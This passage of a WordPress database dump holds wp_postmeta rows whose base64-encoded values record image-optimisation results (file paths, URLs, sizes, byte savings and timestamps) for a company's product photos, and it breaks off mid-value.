TZcLzA5XC9HMDgzMUItMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRzA4MzFCLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9HMDgzMUItMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTAwNzksInRpbWUiOjE0ODM1NTM0NjksImlkIjoxODU0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0cwODMxQi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0cwODMxQi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0cwODMxQi0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTA3LCJ0aW1lIjoxNDgzNTUzNDcyLCJpZCI6MTg1NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9HMDgzMUItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9HMDgzMUItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9HMDgzMUItMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQzMCwidGltZSI6MTQ4MzU1MzQ3NiwiaWQiOjE4NTR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRzA4MzFCLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRzA4MzFCLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRzA4MzFCLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0OTcsInRpbWUiOjE0ODM1NTM0NzksImlkIjoxODU0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0cwODMxQi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0cwODMxQi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0cwODMxQi01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTM0NSwidGltZSI6MTQ4MzU1MzQ4MywiaWQiOjE4NTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9HMDgzMUItMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9HMDgzMUItMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9HMDgzMUItMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjc4MywidGltZSI6MTQ4MzU1MzQ4NiwiaWQiOjE4NTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9HMDgzMUItNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9HMDgzMUItNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9HMDgzMUItNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjgzMSwidGltZSI6MTQ4MzU1MzQ4OSwiaWQiOjE4NTR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9HMDgzMUItOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRzA4MzFCLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9HMDgzMUItOTB4OTAuanBnIiwicmVkdWN0aW9uIjozNjYsInRpbWUiOjE0ODM1NTM0OTIsImlkIjoxODU0fV0='); 
INSERT INTO `wp_postmeta` VALUES (29088, 1853, 'wpfc_optimisation_reduction', '22680'); 
INSERT INTO `wp_postmeta` VALUES (29089, 1853, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvQ09CUkEtQlJVU0guanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9DT0JSQS1CUlVTSC5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTUzNDk3LCJpZCI6IjE4NTMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0NPQlJBLUJSVVNILTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvQ09CUkEtQlJVU0gtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9DT0JSQS1CUlVTSC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NzkwLCJ0aW1lIjoxNDgzNTUzNTAwLCJpZCI6MTg1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9DT0JSQS1CUlVTSC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0NPQlJBLUJSVVNILTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvQ09CUkEtQlJVU0gtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjI3MTMsInRpbWUiOjE0ODM1NTM1MDQsImlkIjoxODUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0NPQlJBLUJSVVNILTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvQ09CUkEtQlJVU0gtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9DT0JSQS1CUlVTSC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MjQyNSwidGltZSI6MTQ4MzU1MzUwNywiaWQiOjE4NTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvQ09CUkEtQlJVU0gtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvQ09CUkEtQlJVU0gtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0NPQlJBLUJSVVNILTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjExODk5LCJ0aW1lIjoxNDgzNTUzNTExLCJpZCI6MTg1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9DT0JSQS1CUlVTSC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0NPQlJBLUJSVVNILTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvQ09CUkEtQlJVU0gtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU0OSwidGltZSI6MTQ4MzU1MzUxNCwiaWQiOjE4NTN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvQ09CUkEtQlJVU0gtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9DT0JSQS1CUlVTSC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0NPQlJBLUJSVVNILTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NTgsInRpbWUiOjE0ODM1NTM1MTgsImlkIjoxODUzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0NPQlJBLUJSVVNILTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvQ09CUkEtQlJVU0gtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9DT0JSQS1CUlVTSC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTMwLCJ0aW1lIjoxNDgzNTUzNTIxLCJpZCI6MTg1M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9DT0JSQS1CUlVTSC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0NPQlJBLUJSVVNILTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvQ09CUkEtQlJVU0gtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE2MDgsInRpbWUiOjE0ODM1NTM1MjUsImlkIjoxODUzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvQ09CUkEtQlJVU0gtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9DT0JSQS1CUlVTSC0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0NPQlJBLUJSVVNILTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo1MTYsInRpbWUiOjE0ODM1NTM1MjgsImlkIjoxODUzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvQ09CUkEtQlJVU0gtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9DT0JSQS1CUlVTSC00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0NPQlJBLUJSVVNILTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo4MTQsInRpbWUiOjE0ODM1NTM1MzEsImlkIjoxODUzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvQ09CUkEtQlJVU0gtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvQ09CUkEtQlJVU0gtOTB4OTAuanBnIiwid2lkdGgiOiI5MCIsImhlaWdodCI6IjkwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0NPQlJBLUJSVVNILTkweDkwLmpwZyIsInJlZHVjdGlvbiI6Mzc4LCJ0aW1lIjoxNDgzNTUzNTM0LCJpZCI6MTg1M31d'); 
INSERT INTO `wp_postmeta` VALUES (29090, 1846, 'wpfc_optimisation_reduction', '2362514'); 
INSERT INTO `wp_postmeta` VALUES (29091, 1846, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWxlY3RyaWNhbC1jb250YWN0LWx1YnJpY2FudC0xLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWxlY3RyaWNhbC1jb250YWN0LWx1YnJpY2FudC0xLmpwZyIsIndpZHRoIjoyOTk5LCJoZWlnaHQiOjE5OTksIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lbGVjdHJpY2FsLWNvbnRhY3QtbHVicmljYW50LTEuanBnIiwicmVkdWN0aW9uIjoyMzYyNTAzLCJ0aW1lIjoxNDgzNTUzNTQ1LCJpZCI6IjE4NDYifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VsZWN0cmljYWwtY29udGFjdC1sdWJyaWNhbnQtMS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VsZWN0cmljYWwtY29udGFjdC1sdWJyaWNhbnQtMS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2VsZWN0cmljYWwtY29udGFjdC1sdWJyaWNhbnQtMS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MzU0OCwiaWQiOjE4NDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWxlY3RyaWNhbC1jb250YWN0LWx1YnJpY2FudC0xLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWxlY3RyaWNhbC1jb250YWN0LWx1YnJpY2FudC0xLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvZWxlY3RyaWNhbC1jb250YWN0LWx1YnJpY2FudC0xLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUzNTUxLCJpZCI6MTg0Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9lbGVjdHJpY2FsLWNvbnRhY3QtbHVicmljYW50LTEtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9lbGVjdHJpY2FsLWNvbnRhY3QtbHVicmljYW50LTEtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lbGVjdHJpY2FsLWNvbnRhY3QtbHVicmljYW50LTEtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTM1NTQsImlkIjoxODQ2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VsZWN0cmljYWwtY29udGFjdC1sdWJyaWNhbnQtMS0xNjAweDEwNjYuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9lbGVjdHJpY2FsLWNvbnRhY3QtbHVicmljYW50LTEtMTYwMHgxMDY2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2VsZWN0cmljYWwtY29udGFjdC1sdWJyaWNhbnQtMS0xNjAweDEwNjYuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUzNTU4LCJpZCI6MTg0Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9lbGVjdHJpY2FsLWNvbnRhY3QtbHVicmljYW50LTEtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9lbGVjdHJpY2FsLWNvbnRhY3QtbHVicmljYW50LTEtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9lbGVjdHJpY2FsLWNvbnRhY3QtbHVicmljYW50LTEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTM1NjAsImlkIjoxODQ2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VsZWN0cmljYWwtY29udGFjdC1sdWJyaWNhbnQtMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2VsZWN0cmljYWwtY29udGFjdC1sdWJyaWNhbnQtMS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2VsZWN0cmljYWwtY29udGFjdC1sdWJyaWNhbnQtMS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MzU2MywiaWQiOjE4NDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvZWxlY3RyaWNhbC1jb250YWN0LWx1YnJpY2FudC0xLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0Ijoy